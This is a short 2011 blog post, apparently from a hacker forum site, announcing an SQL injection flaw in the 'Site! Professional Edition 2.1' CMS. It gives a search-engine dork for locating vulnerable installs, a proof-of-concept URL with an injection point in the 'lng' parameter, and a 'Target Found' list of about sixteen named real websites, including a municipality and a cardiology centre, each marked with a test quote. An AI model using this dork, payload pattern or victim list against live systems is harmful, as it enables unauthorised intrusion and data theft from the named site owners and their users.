Monday, April 4, 2011


Site! Prof Edition 2.1 CMS SQL Injection Vulnerability

# Product : CMS Site! Professional Edition 2.1
# Vulnerability : SQL Injection
# Dork :  inurl:/index.php?node= &lng=


[0x01] SQL Injections :
# POC :  http://www.site.com/index.php?node=xxx&lng=x[SQLi]
# Demo : http://www.collinadoro.com/index.php?node=51&lng=1[SQLi]
Target Found:
http://www.malta2010.net/index.php?node=335&lng=1%27
http://www.cardiocentro.org/index.php?node=301&lng=2%27
http://www.peuxreels.com/index.php?node=300&lng=3%27
http://www.buzziebuzzi.ch/index.php?node=288&lng=1%27
http://www.hessemontagnola.ch/index.php?node=2&lng=4%27
http://www.memorial-gander.ch/index.php?node=266&lng=2%27
http://www.bellinzona.ch/index.php?node=7&lng=1%27
http://www.paragonsport.ch/index.php?node=292&lng=1%27
http://www.winteracademy.net/index.php?node=305&lng=1%27
http://www.dupontdesign.ch/index.php?node=325&lng=1%27
http://www.calendar-game.com/index.php?node=297&lng=1%27
http://www.cadro.ch/index.php?node=293&lng=1%27
http://www.volontariato-sociale.ch/index.php?node=291&lng=1%27
http://www.guidottiarchitetti.com/index.php?node=292&lng=1%27
http://www.cstenero.ch/index.php?node=240&lng=6%27
http://www.collinadoro.com/index.php?node=7&lng=1%27

No comments:

Template by : mhiman@ hacker-newbie.org